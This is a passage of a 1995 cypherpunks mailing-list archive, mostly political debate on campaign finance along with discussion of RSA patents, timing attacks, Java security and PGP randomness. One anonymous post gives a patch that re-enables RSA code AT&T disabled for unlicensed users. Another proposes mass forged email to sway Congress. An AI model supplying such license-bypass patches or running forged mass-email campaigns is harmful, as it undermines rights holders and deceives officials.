suddenly agrees with me. (Sorry, no ruling yet in my case. Stay tuned.) But RSA Data lawyers will have to stand up in court and say that after enforcing the Stanford patent against all public-key users for 5 years, RSA Data suddenly had a revelation that the Stanford patents are invalid after all. It should be amusing. 2:00 pm, Thurs., Jan. 4, 1996 RSA Data v. Cylink/CKC, Case C-95-03256 WHO SF Federal Bldg, court #7, Judge Orrick 450 Golden Gate Ave Directions: Take 9th up from Market -- it turns into Larkin and the federal bldg is on the corner with Golden Gate Ave. docket clerk: 415-522-2060 Roger Schlafly phone: 408-476-3550 CompuServe: 76646,323 US Mail: PO Box 1680, Soquel, CA 95073 USA Internet: rschlafly at attmail.com From EALLENSMITH at mbcl.rutgers.edu Tue Dec 19 11:25:26 1995 From: EALLENSMITH at mbcl.rutgers.edu (E. ALLEN SMITH) Date: Tue, 19 Dec 95 11:25:26 PST Subject: Political Cleanup program [NOISE] Message-ID: <01HYZTGSFLM48Y529F@mbcl.rutgers.edu> From: IN%"hallam at w3.org" 19-DEC-1995 13:48:07.90 >It is very strange the way that "Libertarians" are so able to turn all rights into property rights. Thus freedom of speech become freedom to have influence on the politicial process in direct proportion to wealth. ------------------ Funny, I'm disagreeing with you, and I believe that government ought to be involved with making sure everyone has a chance to make political speech (via subsidies of education). That doesn't mean that those who can make more speech (through money or any other ability) should be handicapped. ------------------ >I began work on the web in '92 because I saw its potential as a political tool which did not have the bias of wealth. It has the potential to create a new kind of political dialogue. When the Web becomes as ubiquitous as the telephone we will still see inequalities of power, the homeless and the poor will still be underrepresented. But that situation must be judged against our own where the political process can be bought and traded as if it were any other form of comodity. ------------------ You're making the classic PC (otherwise known as distorted egalitarian) mistake: you're wanting equality of results instead of equality of opportunity. Freedom of speech and the press doesn't mean that everyone gets a free press subsidized by the government, and no usage of means outside of that. It means that everyone _potentially_ can influence the political process and the marketplace of ideas. ------------------ >It is not simply an issue of money, it is an issue of national security. If a foreigner were to control the majority of the media there would be a significant threat to the national interest. This threat has been realised in the UK with the comming to power of Rupert Murdoch. Fortunately his influence on the US political scene has thus far been minor. In his own country he has brought down the government more than once. ----------------- This argument looks quite similar to those used for Canadian Content restrictions. "We can't let in Hollywood, they might be more demanded by the people than our own culture." "We can't let in Rupert Murdoch, his product might be more demanded by the people than our own products." It all comes down to people not having the courage to let their ideas be tested by what will get the most demand. -Allen From adam at lighthouse.homeport.org Mon Dec 18 19:32:52 1995 From: adam at lighthouse.homeport.org (Adam Shostack) Date: Tue, 19 Dec 1995 11:32:52 +0800 Subject: redirect of newsgroups In-Reply-To: <9511188193.AA819305757@cc2.dttus.com> Message-ID: <199512190221.VAA20286@homeport.org> Yeah, buy an account on a local ISP, or on C2, got.net, or some other cypherpunk run/supporting business. Adam | For those of us sitting behind a firewall that blocks out all of the | alt, rec, etc.. newsgroups...is there another way to access these | groups? For example, redirecting the contents of alt.2600 to, say, | comp.2600 (because this firewall allows the comp.xxx groups through). | Or any other hacks around this inconvenience? -- "It is seldom that liberty of any kind is lost all at once." -Hume From a-kurtb at microsoft.com Tue Dec 19 11:33:19 1995 From: a-kurtb at microsoft.com (Kurt Buff (Volt Comp)) Date: Tue, 19 Dec 95 11:33:19 PST Subject: Political Cleanup program [NOISE] Message-ID: ---------- From: hallam at w3.org[SMTP:hallam at w3.org] Sent: Tuesday, December 19, 1995 8:22 To: Bill Stewart; cypherpunks at toad.com Cc: hallam at w3.org Subject: Re: Political Cleanup program [NOISE] >I happen to believe in freedom of speech, especially political speech, >and if you're not allowed to spend money broadcasting your speech or >printing your messages, you don't have much freedom of press or speech. It is very strange the way that "Libertarians" are so able to turn all rights into property rights. Thus freedom of speech become freedom to have influence on the politicial process in direct proportion to wealth. Not so strange really. All rights, correctly understood, *are* property rights. What most don't understand is that rights are protections from the initiation of force by others. What this means is that you (anyone) don't have the right to the property of others. You have the right to offer mutually satisfactory exchanges, or even solicit outright gifts, but what is yours is yours, and it shouldn't be subject to extortion or theft by others. This includes your time, cash, and any other tangible assets you may own. I began work on the web in '92 because I saw its potential as a political tool which did not have the bias of wealth. It has the potential to create a new kind of political dialogue. When the Web becomes as ubiquitous as the telephone we will still see inequalities of power, the homeless and the poor will still be underrepresented. But that situation must be judged against our own where the political process can be bought and traded as if it were any other form of comodity. The problem with the political process now is that the government and its beneficiaries (which includes both the large corporation and the welfare class) have over time arrogated to themselves the power to steal (via taxes and regulation) our lives and our livelihood from us. The poor and the rich will always be with us, but they shouldn't be special clients of the state at the expense of everyone else. It is not simply an issue of money, it is an issue of national security. If a foreigner were to control the majority of the media there would be a significant threat to the national interest. This threat has been realised in the UK with the comming to power of Rupert Murdoch. Fortunately his influence on the US political scene has thus far been minor. In his own country he has brought down the government more than once. The only reason foreign money might be a threat to us is again that the government arrogated to itself the power to regulate our lives. The reason and interest for lobbying the government, whether through the press or through other, more direct, efforts is that the government *can do something* about whatever happens to be at issue. Take away the ability of the government to act, and there won't be any money spent lobbying it. I submit we'd all be better off. >And as far as "prevent the political process from being owned by the rich" >goes, there have been brief exceptions over the last 5000 years in which >the less-rich have overthrown the rich, but campaign finance laws have almost >never kept the rich or the politicians from helping each other out. In UK politicis the influence of an individual's money is limited to influencing one party. Even that is done behind closed doors. The other major parties both limit the size of individual contributions to a constituency party to a relatively nominal sum. $5000 is a huge sum in UK politics. >I also don't believe freedom of speech should be limited by national >boundaries. Nor do I. But I only vote in one country. If we take the question outside the US it would not on the whole be a good thing if the Prime Minister of Tobago (say) were provided with a campaign contribution of $1M by a foreign company with an interest in strip mining the entire island. similarly it would be a bad thing if Columbian drug lords were to make massive contributions to politicians committed to continuing the prohibition on drugs. See my above comments. Only if the PM of Tobago could steal the land from its owners could he permit the island to be strip-mined. And only if the government has the power to prohibit drug possession would the Cali cartel be interested in making campaign contributions. No power to do something, no money offered to do it. Kurt [speaking only for myself, of course] Phill From cpunk at remail.ecafe.org Mon Dec 18 19:50:59 1995 From: cpunk at remail.ecafe.org (ECafe Anonymous Remailer) Date: Tue, 19 Dec 1995 11:50:59 +0800 Subject: No Subject Message-ID: <199512182157.VAA32380@pangaea.ang.ecafe.org> Submitted for your approval... The recent CryptoLib, offered by the nice folks at AT&T (Written by Jack Lacy and Don Mitchell), has a small problem: folks without RSA licenses are given a crippled version without functional RSA code. It sucks, but they must cover their collective asses. That small problem has now been rectified. Is CryptoLib available overseas yet? ================================CUT HERE=================================== *** - Sun Dec 17 20:05:50 1995 --- rsa.c Sun Dec 17 20:05:36 1995 *************** *** 411,421 **** #endif { BigInt result; ! fprintf(stderr, "RSA encryption not supported without license.\n"); ! result = bigInit(0); return result; } - #ifdef K_AND_R _TYPE( BigInt ) RSADecrypt(message, key) --- 411,420 ---- #endif { BigInt result; ! result = bigInit(0); ! bigPow(message, key->publicExponent, key->modulus, result); return result; } #ifdef K_AND_R _TYPE( BigInt ) RSADecrypt(message, key) *************** *** 427,434 **** #endif { BigInt result; ! fprintf(stderr, "RSA decryption not supported without license.\n"); ! result = bigInit(0); return result; } --- 426,433 ---- #endif { BigInt result; ! result = bigInit(0); ! chineseRemTheorem(message, key, result); return result; } From llurch at networking.stanford.edu Mon Dec 18 19:58:27 1995 From: llurch at networking.stanford.edu (Rich Graves) Date: Tue, 19 Dec 1995 11:58:27 +0800 Subject: (Fwd) SECURITY ALERT: Password protection bug in Netscape 2.0b In-Reply-To: <9512190026.AA15461@toad.com> Message-ID: Except for the bit about the file not being deleted after quitting Netscape (which is Bad), this is old news. This is why security-conscious sites like banking.wellsfargo.com ask for passwords in an SSL-encrypted form rather than via simple browser authentication. Even if Netscape did delete the "password cache," anyone with physical access to your machine could still recover it from disk. I believe that Microsoft Internet Explorer and other browsers derived from Mosaic do the same thing. Netscape et al know that simple browser authentication is of limited usefulness, which is why we keep trying to commit them to DCE. -rich From dklur at dttus.com Tue Dec 19 11:59:41 1995 From: dklur at dttus.com (David Klur) Date: Tue, 19 Dec 95 11:59:41 PST Subject: E-cash coin questions (Mark Twain / Digicash) Message-ID: <9511198194.AA819410227@cc2.dttus.com> 1. How many different coins (serial numbers) can the current Mark Twain/Digicash protocol support? 2. Does Mark Twain bank maintain 2 lists: 1 of all the ecash serial numbers for all coins ever produced, and 1 of all the ecash serial numbers for all coins that have been spent before? Or just 1 list of the spent coins (assuming that any coin that is signed w/MT's private key and does not appear on the "spent" list is still valid and is not counterfeit)? 3. The Digicash scheme allows each coin to be used only once and then destroyed. How many coins will it take before all possible coins are minted, used and destroyed thereby requiring banks to issue new coins with "recycled" serial numbers? Remember, each time a "transaction" takes place, an existing coin is destroyed and a new coin is minted. and a transaction can simply be Alice giving her friend Bob a dollar (not necessarily using the ecash for a purchase) 4. What is the probability of guessing a valid serial number, assuming there are 1 million, 1 billion or 1 trillion coins in circulation? 5. Suppose you have a very large number of cash coins signed by the same bank (say, Mark Twain) and you know the record layout of each coin (easy enough since you can decrypt it with the bank's public key), and for each coin the "bank name" field is the same (because it's the same bank!) -- then, would it be possible to hack the RSA encryption and recreate the bank's private key? -----BEGIN PBP SIGNATURE----- Version: 1.0.0, Copyright 1995, Pretty Bad Privacy David Klur dklur at dttus.com I am who I am because I say so. So there. -----END PBP SIGNATURE------- From mab at research.att.com Tue Dec 19 12:02:14 1995 From: mab at research.att.com (Matt Blaze) Date: Tue, 19 Dec 95 12:02:14 PST Subject: revised time quantization package (Unix & WIN32) available Message-ID: <199512192009.PAA17051@nsa.tempo.att.com> A revised version of my simple CPU time quantization package is now available for most Unix and, thanks to the efforts of Frank O'Dwyer (Rainbow Diamond Ltd), WIN32 platforms. The package provides a simple interface to encapsulate code blocks that must run in a multiple of a coarse-grained "quantized" amount of CPU time. It is useful in building various on-line cryptographic protocols in which an attacker could otherwise learn key information by observing the time the target takes to perform calculations that use the secret (c.f., Paul Kocher's recent attacks). The basic idea is that you can specify a "quantum" such that at the end of an encapsulated block the CPU will busy-wait until the next quantum multiple. Fine-grained (below the quantum) timing information is thereby denied to the observer (including unprivileged processes on the same machine). The code is quick-and-dirty and only runs on Unix-centric and WIN32-based platforms. Test and use at your own risk. There are (basically) no restrictions on the use or distribution of the (very simple) code. Get it from: ftp://research.att.com/dist/mab/quantize.shar The quantize package is also part of Jack Lacy's cryptolib package (watch this space for details). -matt From frantz at netcom.com Tue Dec 19 12:22:25 1995 From: frantz at netcom.com (Bill Frantz) Date: Tue, 19 Dec 95 12:22:25 PST Subject: Java and timing info - second attempt Message-ID: <199512192018.MAA27098@netcom23.netcom.com> >Jim Miller (jim_miller at bilbo.suite.com) writes: >Of course it would be a lot easier for the applet to just try to read the >secret key file, encrypt it with an embedded public key, and post it to >alt.anonymous.messages. If I understand Java security correctly, the applet can just send data back to the server it was loaded from, but can't read random files on the machine it runs on (even if the user running it can read them). Java is beginning to become cluefull about the idea that a program is not the same as the person running it, and should not have the same privileges. In this area, most OSs (inluding Unix) are totally clueless, which is why the Orange Book has mandatory security requirements at the "B" and above levels. ----------------------------------------------------------------- Bill Frantz Periwinkle -- Computer Consulting (408)356-8506 16345 Englewood Ave. frantz at netcom.com Los Gatos, CA 95032, USA From sinclai at ecf.toronto.edu Tue Dec 19 12:30:49 1995 From: sinclai at ecf.toronto.edu (SINCLAIR DOUGLAS N) Date: Tue, 19 Dec 95 12:30:49 PST Subject: DES modem Message-ID: <95Dec19.153022edt.1588@cannon.ecf.toronto.edu> I recently aquired a DES modem. It's a MESA432 made by Western Datacom. The writing on the front proclaims "9600 bps NBS DES ENCRYPTION MODEM". It has all of the usual front lights, plus one labled 'encrypt'. On the back it has jacks for leased-line and dial-up, an RS232 connector and an external speaker connector. Has anyone ever used one of these? Can anyone give me any information on it? I realize that without a second modem it's not much use. From bdavis at thepoint.net Mon Dec 18 20:58:49 1995 From: bdavis at thepoint.net (Brian Davis) Date: Tue, 19 Dec 1995 12:58:49 +0800 Subject: Political Cleanup program In-Reply-To: Message-ID: On Sun, 17 Dec 1995, jim bell wrote: > At 02:04 PM 12/17/95 -0800, Detweiler wrote: ........... > A giver could CLAIM to make any sort of donation at all; but if the system > were properly designed he could simply be lying to the officeholder. > > > moreover, other observers > >would not be aware of the relationship. > > Not IMMEDIATELY, perhaps, but eventually the books could be opened, perhaps > as much as years later. (Let's say, 3 months before the end of the term of > the politician. > > And the amounts donated could withheld, with only the total donated reported > every 3 months or so. (And perhaps only to 1 or 2 significant digits of > accuracy.) For example, a Senator will be told on January 1, 1996, that up > until that point he's received "about" $1.4 million dollars of donations. > He would not be able to link these donations with any particular claim. > Somebody could claim to have given him "$2000" of donation, which wouldn't > even show up to the accuracy of the amount told the politician. > I remain unsure of the crypto-relevance, but (just to play Devil's Advocate) have you guys heard of canceled checks? I get mine in my statement every month. Let's see, what could I do with one for $2,000 payable to Joe Sleazeball Politician, from whom I wanted a favor ..... EBD > Further techniques could be used to disguise the rate of giving. > > >why do you think this would be an improvement? > > Easy. It would remove much of the reason for a politician to treat one > citizen differently from another citizen. > > > >to the contrary our current system works hard to require > >the disclosure of who donated what to a candidate, so the candidate's potential > >hidden agendas and ulterior motives can be revealed. seems reasonable to > >me. > > _EVENTUAL_ public disclosure of such information is not inconsistent with > my idea. > ... From hallam at w3.org Tue Dec 19 12:58:49 1995 From: hallam at w3.org (hallam at w3.org) Date: Tue, 19 Dec 95 12:58:49 PST Subject: Antiterrorism Bill Dead In-Reply-To: <2.2b10.32.19951219163342.006753a4@panix.com> Message-ID: <9512192058.AA14733@zorch.w3.org> >Now if we could only convince the Fundies that the Klinton Admin was going >to use the Exxon amendment to outlaw religious speech on the nets on the >grounds of political indecency. But maybe the Telecoms bill will die too. >It did last time. Last I heard it was headed for a veto. Way too much pork for Republican contributors to get anywhere. Phill From tcmay at got.net Mon Dec 18 21:02:43 1995 From: tcmay at got.net (Timothy C. May) Date: Tue, 19 Dec 1995 13:02:43 +0800 Subject: What ever happened to... Cray Comp/NSA co-development Message-ID: At 6:15 PM 12/18/95, Derek Atkins wrote: >Correction of another detail: > >> > tcmay at got.net (Timothy C. May) writes: >> > When you've done this, and concluded that RSA-129 could be done in, say, X >> > minutes, then move on to RSA-384 (the BlackNet key cracked by the MIT >> > group), and on to the 1024- and 2048-bit keys. Tell us how many years or >> > centuries it will take. (Hint: Rivest and Schneier have done these > >RSA-129 is 129 decimal digits, not 129 bits. This computes to about >425 bits, which is actually more difficult than the 384-bit Blacknet >key. I'm not having much luck on this example, am I? The RSA-129 I remembered correctly as being 129 decimal digits, but I spaced out on the 384-bit key and mislabelled it as "RSA-384." It'll be _many_ years before a 384-decimal-digit number is factored, I suspect. Let alone a 600-digit modulus, with or without the mysterious "transphaser" technology mentioned by Anitro. --Tim May Views here are not the views of my Internet Service Provider or Government. ---------:---------:---------:---------:---------:---------:---------:---- Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero Corralitos, CA | knowledge, reputations, information markets, Higher Power: 2^756839 | black markets, collapse of governments. "National borders are just speed bumps on the information superhighway." From fc at all.net Tue Dec 19 13:05:48 1995 From: fc at all.net (Dr. Frederick B. Cohen) Date: Tue, 19 Dec 95 13:05:48 PST Subject: Forged email to sway congress Message-ID: <9512192101.AA13974@all.net> It seems like a trivial thing to do, but if email to Congress works to sway opinion, it should be fairly easy to create thousands of email messages from different apparent sources each hour, all supporting a point of view, and to suppliment this effort with a small telephone room full of people to fill congressional switchboards with supportive phone calls. Interesting PM attack. -> See: Info-Sec Heaven at URL http://all.net/ Management Analytics - 216-686-0090 - PO Box 1480, Hudson, OH 44236 From jimbell at pacifier.com Mon Dec 18 21:19:02 1995 From: jimbell at pacifier.com (jim bell) Date: Tue, 19 Dec 1995 13:19:02 +0800 Subject: Campaign Finance Reform Message-ID: At 10:41 AM 12/18/95 -0500, you wrote: >On Mon, 18 Dec 1995, Jon Lasser wrote: > >> On Sun, 17 Dec 1995, jim bell wrote: >... >> > It is absolutely true that you couldn't stop a person from communicating >> > claims of a donation to a politician. But what you COULD do is to ensure >> > that the donor couldn't PROVE that he made such a donation. In other words, >> > _I_ could claim that I gave $1K to Senator Sludgepump (a lie) and the good >> > senator would have no idea that I wasn't telling the truth. The people who >> > REALLY made such donations would be helpless. >> >> A tricky way around this, if it's done ALMOST properly, is to donate in >> odd amounts... ie "Senator Sludgepump, I am going to donate $469.23 to >> your campaign..." >> >> All this means is that the donations would have to be lumped in some way >> so that Senator Sludgepump can't find out the exact amounts donated by >> any individual. > >Cancelled checks. > >Or, hand check in addressed, stamped envelope to Senator Sludgepump and >ask him if he would mind sealing it and dropping it in a mailbox. > All of which raises numerous opportunities for sting operations against politicians, done by individuals by procedures provided for under law. Escrow (Okay, I know that's a dirty word around here, but...) an encrypted statement of how you intend to run the sting, to be opened by the escrow agent at some point in the future, explaining who you're going after and how. Make the contribution, keep evidence, and if you're successfull the congressman goes to jail for a few years. From vvallopp at eniac.seas.upenn.edu Tue Dec 19 13:19:07 1995 From: vvallopp at eniac.seas.upenn.edu (Vinod Valloppillil) Date: Tue, 19 Dec 95 13:19:07 PST Subject: cyphernomicon FTP site? Message-ID: <199512192118.QAA02590@red.seas.upenn.edu> Anyone know where I can FTP a full copy of the cyphernomicon? ------------------------------+----------------------------------------------- Vinod Valloppillil | LibertarianismTelecommunicationsFreeMarketEnvi Engineering/Wharton | ronmentalismTechnologyCryptographyElectronicCa University of Pennsylvania | shInteractiveTelevisionEconomicsPhilosophyDigi vvallopp at eniac.seas.upenn.edu | talPrivacyAnarchoCapitalismRuggedIndividualism ------------------------------+----------------------------------------------- From EALLENSMITH at ocelot.Rutgers.EDU Mon Dec 18 21:20:21 1995 From: EALLENSMITH at ocelot.Rutgers.EDU (E. ALLEN SMITH) Date: Tue, 19 Dec 1995 13:20:21 +0800 Subject: Political Cleanup program Message-ID: <01HYYIT21PW88Y51HJ@mbcl.rutgers.edu> From: "Vladimir Z. Nuri" >there seem to be a lot of people who suggest that merely because politics involves money, it is therefore corrupt. this is an awfully vague and nebulous line of thinking in my view. are we to suppose that any industry that involves money (all of them, of course) inevitably moves in the direction of corruption? perhaps some more "cynicalpunks" may have this view, but I don't share it. --------------------------------- I am admittedly uncertain whether to reply to this, but... one thing about capitalism is that money serves as a reward. Attempts to remove this (such as in the Soviet Union) have resulted in people no longer being motivated by things like bonuses. In other words, if we can remove the government from having influence on the markets, then politics by money is not really a problem. It's just another motivation for people to get more money. -Allen From adam at lighthouse.homeport.org Mon Dec 18 21:41:40 1995 From: adam at lighthouse.homeport.org (Adam Shostack) Date: Tue, 19 Dec 1995 13:41:40 +0800 Subject: PGP's randpool() Message-ID: <199512190326.WAA20676@homeport.org> What does PGP do when it exhausts randpool? I've scanned the source, and found some useful tidbits, but RANDPOOLBITS seems limited to ~408 bytes. I can invoke commands that should exhaust PGP's randpool, but don't seem to. Doing "pgp +makerandom=4000000 foo" repeatedly seemingly would cause PGP to prompt me to type in some random stuff, but it doesn't. I'm trying to see how pgp reacts to me taking all its random bytes because I'm writing some shell scripts that use pgp to generate random passphrases. (This is a case where I don't think bunches of system data are enough.) (Note to reporters who might be listening: This is an fairly unusual invocation of PGP where a user would not interact with the program at all to supply new randomness. Its not an attack on PGP's security in any interesting or newsworthy sense.) random.c: * - Every time you run PGP, especially when responding to one of PGP's * prompts, PGP samples the keystrokes for use as random numbers. * It is a shame to throw this entropy (randomness) away just because * there is no need for it in the current invocation of PGP [... Further down...] /* * Performs an accumulation of random bits. As long as there are fewer bits * in the buffer than are needed (the number passed, plus pending bits), * prompt for more. [heavily cut] void trueRandAccum(unsigned count) /* Get this many random bits ready */ { LANG("\nWe need to generate %u random bits. This is done by measuring the\ \ntime intervals between your keystrokes. Please enter some random text\ \non your keyboard until you hear the beep:\n"), count-trueRandBits); -- "It is seldom that liberty of any kind is lost all at once." -Hume From cpunk at remail.ecafe.org Tue Dec 19 14:30:34 1995 From: cpunk at remail.ecafe.org (ECafe Anonymous Remailer) Date: Tue, 19 Dec 95 14:30:34 PST Subject: revised time quantization package (Unix & WIN32) available Message-ID: <199512192232.WAA18554@pangaea.ang.ecafe.org> AT&T Spokesman Matt Blaze writes: blah blah >There are (basically) no restrictions on the use or distribution >of the (very simple) code. This is simply untrue. Read the fine print in the file. Use this code and you owe them big. They'll "reach out and touch" you big time. If they were serious, they'd gpl it. >Get it from: > ftp://research.att.com/dist/mab/quantize.shar > >The quantize package is also part of Jack Lacy's cryptolib package >(watch this space for details). I don't understand why this group continues to tolerate these blatently commercial messages from att (and netscape.) (The message is really just an ad for the cryptolib product, as it says). I've also said this b4 but I'll say it again: why would anyone in their right mind trust binary code from att after the clipper fiasco. And why do we tolerate Jeff Weinstein and Mat Blaze calling themselves cypherpunks, when they are so clearly just working us for their corporate interests? I wonder how much they get paid to monitor this list? From a-kurtb at microsoft.com Tue Dec 19 14:40:11 1995 From: a-kurtb at microsoft.com (Kurt Buff (Volt Comp)) Date: Tue, 19 Dec 95 14:40:11 PST Subject: Political Cleanup program Message-ID: Ya won't have complete equity amongst lobbyists, until ya remove the power of bureaucrats to control people's lives. When laws can be used to deprive people of their livelihood, via either taxation or regulation, you will create situations where people can make money from it, and therefore unscrupulous people will take advantage. The only defensible argument for government at all is to protect people from depredation, either from fellow citizens or from external threats. When you prevent people from engaging in peaceful commerce, you open the floodgates to tyranny. Thus, the solution is less government, not to try to legislate human nature. Kurt [speaking for myself, of course] ---------- From: Richard Huddleston[SMTP:reh at wam.umd.edu] Sent: Monday, December 18, 1995 6:12 To: jimbell at pacifier.com; vznuri at netcom.com Cc: cypherpunks at toad.com Subject: Re: Political Cleanup program Detweiler wrote: * >JB: * >>Politics is traditionally corrupt, it appears, because donors to politicians * >>and political campaigns expect a quid pro quo for their donations. Various * >>unsatisfactory solutions include campaign spending limits, etc. * > * >I have an unusual view that I've never seen elsewhere: the problem with * >our government is not that money or PACs are involved, but that the system * >does not handle or resolve the conflicts between them very well. in other * >words, in contrary to the current view that all PACs are evil, I think the * >problem is not that we have PACs, but that our current system does not * >balance their demands in some sensible manner. the system is * >susceptible to corruption. it is conceivable however that there would be * >a system that involves money and politics but still avoids corruption. Not to sound like a dupe or anything, but every time I get discouraged at the rampant mealyism of our political system I go read the first couple of paragraphs of a text from GOVT 101. There, I get reminded that the way most political debate is handled elsewhere is with bullets. Personally, I welcome a complete equity between all lobbyists seeking to obtain a politico's ear. Take the money out of the equation, and let the merits of their causes, if any, stand on their own. Happy holidays, Richard From Bill.Humphries at msn.fullfeed.com Tue Dec 19 15:14:37 1995 From: Bill.Humphries at msn.fullfeed.com (Bill Humphries) Date: Tue, 19 Dec 95 15:14:37 PST Subject: Applescripts for monitoring Netscape Activity Message-ID: The recent Netscape beta bug mentioned here raised a technical question? Anyone here have a pointer to an applescript, frontier or macperl script for monitoring what programs do to your system folder and desktop? Otherwise, I'd better write one. It'd be a good way to learn more about the behavior of apps. Thanks and happy holidays, Bill Humphries Call your Representative and Senators and demand an end to attempts to censor the Internet. More info at http://www.vtw.org/ *** The answer to porn speech is free speech -- via Molly Ivins *** From jsw at netscape.com Mon Dec 18 23:39:38 1995 From: jsw at netscape.com (Jeff Weinstein) Date: Tue, 19 Dec 1995 15:39:38 +0800 Subject: Java and timing info - second attempt In-Reply-To: <9512190402.AA12992@bilbo.suite.com> Message-ID: <30D65C32.4500@netscape.com> Jim Miller wrote: > Would it be possible to create a Java applet that causes the client > machine to sign or encrypt something with their private key, and then send > back timing info? > > For the answer to be YES a few things need to be true. There needs to be > some sort of standard crypto API in use that can be accessed by a Java > script, and Java scripts need to be able to capture and send back timing > info. Does anyone on this list know enough about Java to know if it can > do any of these things? In Netscape Navigator 2.0 Java and JavaScript do not have access to crypto routines. At some point in the future this will probably change, but only after we understand the implications much better than we do today. --Jeff -- Jeff Weinstein - Electronic Munitions Specialist Netscape Communication Corporation jsw at netscape.com - http://home.netscape.com/people/jsw Any opinions expressed above are mine. From hallam at w3.org Tue Dec 19 15:48:35 1995 From: hallam at w3.org (hallam at w3.org) Date: Tue, 19 Dec 95 15:48:35 PST Subject: Forged email to sway congress In-Reply-To: <9512192101.AA13974@all.net> Message-ID: <9512192345.AA15356@zorch.w3.org> It already happens with other media. The Christian Coalition have an army of letter writters at their call. They simply write a very large number of letters and post them. It is not difficult if you can afford it. Political staffers know all about this type of thing and can recognise spam. It would be usefull to have some mechanism for producing a one time use ID on the Web however. This would be configured such that each party can vote once but once only. There is stuff in the open meeting system that does this using an email callback loop (later used by First Virtual). Phill From perry at piermont.com Tue Dec 19 15:50:10 1995 From: perry at piermont.com (Perry E. Metzger) Date: Tue, 19 Dec 95 15:50:10 PST Subject: revised time quantization package (Unix & WIN32) available In-Reply-To: <199512192232.WAA18554@pangaea.ang.ecafe.org> Message-ID: <199512192349.SAA25296@jekyll.piermont.com> ECafe Anonymous Remailer writes: [Lots of garbage slandering Matt Blaze, who's about as close to being a dyed-in-the-DNA cypherpunk as you can get.] What I want to know is, why are you doing this? Are you trying to start a flame war? Are you just an asshole? Are you Detweiler? Whats the motive? .pm From a-kurtb at microsoft.com Tue Dec 19 16:00:09 1995 From: a-kurtb at microsoft.com (Kurt Buff (Volt Comp)) Date: Tue, 19 Dec 95 16:00:09 PST Subject: Political Cleanup program [NOISE] Message-ID: Let's try this again, shall we? My mailer didn't act the way I wanted it to... ___________________________________ >I happen to believe in freedom of speech, especially political speech, >and if you're not allowed to spend money broadcasting your speech or >printing your messages, you don't have much freedom of press or speech. It is very strange the way that "Libertarians" are so able to turn all rights into property rights. Thus freedom of speech become freedom to have influence on the politicial process in direct proportion to wealth. _____________________________________ Not so strange really. All rights, correctly understood, *are* property rights. What most don't understand is that rights are protections from the initiation of force by others. What this means is that you (anyone) don't have the right to the property of others. You have the right to offer mutually satisfactory exchanges, or even solicit outright gifts, but what is yours is yours, and it shouldn't be subject to extortion or theft by others. This includes your time, cash, and any other tangible assets you may own. _______________________________________________ I began work on the web in '92 because I saw its potential as a political tool which did not have the bias of wealth. It has the potential to create a new kind of political dialogue. When the Web becomes as ubiquitous as the telephone we will still see inequalities of power, the homeless and the poor will still be underrepresented. But that situation must be judged against our own where the political process can be bought and traded as if it were any other form of comodity. ________________________________________ The problem with the political process now is that the government and its beneficiaries (which includes both the large corporation and the welfare class) have over time arrogated to themselves the power to steal (via taxes and regulation) our lives and our livelihood from us. The poor and the rich will always be with us, but they shouldn't be special clients of the state at the expense of everyone else. _____________________________________ It is not simply an issue of money, it is an issue of national security. If a foreigner were to control the majority of the media there would be a significant threat to the national interest. This threat has been realised in the UK with the comming to power of Rupert Murdoch. Fortunately his influence on the US political scene has thus far been minor. In his own country he has brought down the government more than once. _____________________________________________ The only reason foreign money might be a threat to us is again that the government arrogated to itself the power to regulate our lives. The reason and interest for lobbying the government, whether through the press or through other, more direct, efforts is that the government *can do something* about whatever happens to be at issue. Take away the ability of the government to act, and there won't be any money spent lobbying it. I submit we'd all be better off. ________________________________________________ >And as far as "prevent the political process from being owned by the rich" >goes, there have been brief exceptions over the last 5000 years in which >the less-rich have overthrown the rich, but campaign finance laws have almost >never kept the rich or the politicians from helping each other out. In UK politicis the influence of an individual's money is limited to influencing one party. Even that is done behind closed doors. The other major parties both limit the size of individual contributions to a constituency party to a relatively nominal sum. $5000 is a huge sum in UK politics. >I also don't believe freedom of speech should be limited by national >boundaries. Nor do I. But I only vote in one country. If we take the question outside the US it would not on the whole be a good thing if the Prime Minister of Tobago (say) were provided with a campaign contribution of $1M by a foreign company with an interest in strip mining the entire island. similarly it would be a bad thing if Columbian drug lords were to make massive contributions to politicians committed to continuing the prohibition on drugs. _______________________________________ See my above comments. Only if the PM of Tobago could steal the land from its owners could he permit the island to be strip-mined. And only if the government has the power to prohibit drug possession would the Cali cartel be interested in making campaign contributions. No power to do something, no money offered to do it. ____________________ Phill Kurt [Speaking only for myself, of course] From mab at crypto.com Tue Dec 19 16:03:46 1995 From: mab at crypto.com (Matt Blaze) Date: Tue, 19 Dec 95 16:03:46 PST Subject: revised time quantization package (Unix & WIN32) available In-Reply-To: <199512192232.WAA18554@pangaea.ang.ecafe.org> Message-ID: <199512200009.TAA17192@crypto.com> I don't normally like to respond to anonymous kooks, but... cpunk at remail.ecafe.org (ECafe Anonymous Remailer) writes: > AT&T Spokesman Matt Blaze writes: > blah blah > >There are (basically) no restrictions on the use or distribution > >of the (very simple) code. > > This is simply untrue. Read the fine print in the file. Use this code > and you owe them big. They'll "reach out and touch" you big time. > If they were serious, they'd gpl it. > Since I don't understand what you're talking about, I can't really respond to it. The only restrictions on the use of this code are that you have to acknowledge where it came from and that it comes with no waranty. You also have to keep the notice in place on any copies you give to anyone else. Just like the GPL, only without the nutty requirement that you also give away your own source code. > >Get it from: > > ftp://research.att.com/dist/mab/quantize.shar > > > >The quantize package is also part of Jack Lacy's cryptolib package > >(watch this space for details). > > I don't understand why this group continues to tolerate these blatently > commercial messages from att (and netscape.) (The message is > really just an ad for the cryptolib product, as it says). I've also said > this b4 but I'll say it again: why would anyone in their right mind trust > binary code from att after the clipper fiasco. I think you're confused. AT&T Bell Labs Research (which is soon to be split into two parts, Bell Labs and AT&T Labs, owned by two different companies starting next year) is a research laboratory. A lot of very good cryptology and security people work here. While AT&T (the parent company) is in the products and services business, AT&T Bell Labs doesn't sell any products or services itself. Like most of the computer science researchers in Bell labs (and like those in universities and elsewhere), I publish the results of most the work that I do (modulo some consulting I do for the moneymaking part of the company in order to "pay the rent"). I (like many other researchers) also sometimes create software in the course of my work. When this might be of use to others, I prefer to give it away rather than let it sit idle on my disk. The quantization code (like CFS, swIPe and others) is an example. CryptoLib is another example; it was created by my colleague Jack Lacy. We give that away, too. Bell Labs doesn't advertise anything. We don't have retail customers. Our research software is unconnected with AT&T's commercial activities. We make it available because that's what members of the research community do. Its distribution is neither purely altruistic nor especially mercenary. If you really like our research software, I guess you can switch 